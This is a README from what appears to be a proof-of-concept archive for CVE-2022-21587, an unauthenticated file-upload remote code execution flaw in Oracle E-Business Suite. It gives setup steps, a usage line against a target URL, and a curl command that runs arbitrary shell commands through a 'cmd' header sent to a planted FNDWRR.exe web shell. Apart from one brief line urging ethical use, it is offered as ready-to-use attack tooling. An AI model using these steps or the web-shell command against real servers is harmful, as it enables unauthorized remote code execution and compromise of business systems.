This script automates exploitation of Oracle E-Business Suite (EBS) for CVE-2022-21587 (Unauthenticated File Upload for Remote Code Execution).

Prerequisites for this exploit to run:
- python3 with the modules requests, os, sys, slipit
- uuencode

Before you run it, make sure to use it only for ethical duties.

If the exploit fails to run:
- Make sure you have already installed the prerequisite modules
- Install requests:
  - pip3 install requests
- Install slipit:
  - git clone https://github.com/usdAG/slipit
  - cd slipit
  - python3 setup.py sdist
  - pip3 install --user dist/* OR python3 -m pip install --user dist/*
- Install uuencode:
  - sudo apt install sharutils

Usage: python3 exploit.py http://target.com
- A shell will then pop up, OR you can run commands through the shell using curl or a web proxy tool (Burp Suite)
- Using curl: curl -k https://target/OA_CGI/FNDWRR.exe -H 'cmd: whoami'
- Using Burp Suite: add a `cmd` header to the request with any bash payload you want to execute

[4.0K] /data/pocs/74afd4e209a50f9aa357d2b7bff7ff6c9bb5f5c2
├── [1.7K] exploit.py
└── [ 855] README.md
0 directories, 2 files